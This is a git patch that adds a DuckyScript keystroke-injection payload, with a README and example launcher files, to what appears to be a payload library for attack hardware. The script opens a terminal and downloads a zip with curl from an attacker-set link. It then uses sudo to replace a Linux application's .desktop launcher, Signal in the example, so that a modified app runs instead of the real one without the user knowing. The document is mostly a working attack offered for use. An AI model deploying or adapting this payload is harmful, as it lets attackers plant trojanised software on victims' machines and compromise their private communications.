From 55b84c6ee9b6ddf962e29d7ca8e99528886e26aa Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 12 Jun 2023 11:39:22 +0200 Subject: [PATCH 1/2] Edit The Default Real App With An Arbitrary --- .../payload.txt | 62 +++++++++++++++++++ 1 file changed, 62 insertions(+) create mode 100644 payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt diff --git a/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt b/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt new file mode 100644 index 0000000..7515c07 --- /dev/null +++ b/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt @@ -0,0 +1,62 @@ +REM ################################################################ +REM # | +REM # Title : Edit The Default Real App With An Arbitrary | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Execution | +REM # Target : GNU/Linux (Debian based tested) | +REM # | +REM ################################################################ + + +REM Requirements: +REM - sudo permissions +REM - Internet connection +REM - Executable app +REM - '.desktop' file + + +REM Note: +REM - The Depends* time depends by the app size, the connection fast and the computer power, you should test it + + +REM Set the link from wich will be downloaded the zip archive +DEFINE ARBITRARY_APP_LINK example + +REM You must set the desktop file path present in the zip file, if i.e. you have the app name Signal and the desktop file path is Signal/files/signal you should put the path Signal/files/signal +DEFINE PATH_TO_DESKTOP_FILE example/path + +REM You must know the original desktop name file, if you don't know it you can rich this information download the app on you system and going to /usr/share/applications/ searching this one app, i.e. the desktop file name of Signal application is signal-desktop.desktop, so in this case you should put signal-desktop.desktop +DEFINE ORIGINAL_DESKTOP_FILE_NAME example + +REM sudo permissions needed +DEFINE SUDO example + + +REM Open a shell +DELAY 2000 +CTRL-ALT t +DELAY 1000 + +STRING curl -o ./arbitrary.zip " +STRING ARBITRARY_APP_LINK +STRINGLN " +REM Depends* +DELAY 5000 + +STRINGLN unzip ./arbitrary.zip -d ./.arbitrary +REM Depends* +DELAY 2000 +STRINGLN rm ./arbitrary.zip +DELAY 1000 + +STRING sudo mv ./.arbitrary/ +STRING PATH_TO_DESKTOP_FILE +STRING /usr/share/applications/ +STRING ORIGINAL_DESKTOP_FILE_NAME +ENTER +DELAY 1000 +STRING SUDO +ENTER +DELAY 4000 +ALT f4 From 33d25a6e88c9fb68f4e71d244ccf6c0858a7427e Mon Sep 17 00:00:00 2001 From: aleff-github Date: Mon, 12 Jun 2023 11:40:11 +0200 Subject: [PATCH 2/2] readme --- .../README.md | 36 +++++++++++++++++++ .../[EXAMPLE]arbitrary_file.desktop | 10 ++++++ .../[EXAMPLE]original_desktop_file.desktop | 10 ++++++ 3 files changed, 56 insertions(+) create mode 100644 payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/README.md create mode 100644 payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/[EXAMPLE]arbitrary_file.desktop create mode 100644 payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/[EXAMPLE]original_desktop_file.desktop diff --git a/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/README.md b/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/README.md new file mode 100644 index 0000000..9c002fc --- /dev/null +++ b/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/README.md @@ -0,0 +1,36 @@ +# Edit The Default Real App With An Arbitrary + +A script used to download a modified application on the target computer that will be executed insted off the original one without notify it to the user. + +**Category**: Execution + +## Description + +A script used to download a modified application on the target computer that will be executed insted off the original one without notify it to the user. + +The script will download the zip archive in wich you should have the modified application, then unzip the archive and remove the original zip, then replace the original desktop file with the one that is present on the archive. + +## Getting Started + +### Dependencies + +* sudo permissions +* Internet Connection +* Original application installed + +### Settings + +- Set the link from which to download the zipper archive +```DuckyScript +DEFINE ARBITRARY_APP_LINK example +``` + +- You must set the desktop file path present in the zip file, if i.e. you have the app name Signal and the desktop file path is Signal/files/signal you should put the path Signal/files/signal +```DuckyScript +DEFINE PATH_TO_DESKTOP_FILE example/path +``` + +- You must know the original desktop name file, if you don't know it you can rich this information download the app on you system and going to /usr/share/applications/ searching this one app, i.e. the desktop file name of Signal application is signal-desktop.desktop, so in this case you should put signal-desktop.desktop +```DuckyScript +DEFINE ORIGINAL_DESKTOP_FILE_NAME example +``` \ No newline at end of file diff --git a/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/[EXAMPLE]arbitrary_file.desktop b/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/[EXAMPLE]arbitrary_file.desktop new file mode 100644 index 0000000..4cebf8a --- /dev/null +++ b/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/[EXAMPLE]arbitrary_file.desktop @@ -0,0 +1,10 @@ +[Desktop Entry] +Name=Signal +Exec=~/.arbitrary/bin/signal-desktop --no-sandbox %U +Terminal=false +Type=Application +Icon=signal-desktop +StartupWMClass=Signal +Comment=Private messaging from your desktop +MimeType=x-scheme-handler/sgnl;x-scheme-handler/signalcaptcha; +Categories=Network;InstantMessaging;Chat; \ No newline at end of file diff --git a/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/[EXAMPLE]original_desktop_file.desktop b/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/[EXAMPLE]original_desktop_file.desktop new file mode 100644 index 0000000..da6da63 --- /dev/null +++ b/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/[EXAMPLE]original_desktop_file.desktop @@ -0,0 +1,10 @@ +[Desktop Entry] +Name=Signal +Exec=/opt/Signal/signal-desktop --no-sandbox %U +Terminal=false +Type=Application +Icon=signal-desktop +StartupWMClass=Signal +Comment=Private messaging from your desktop +MimeType=x-scheme-handler/sgnl;x-scheme-handler/signalcaptcha; +Categories=Network;InstantMessaging;Chat; \ No newline at end of file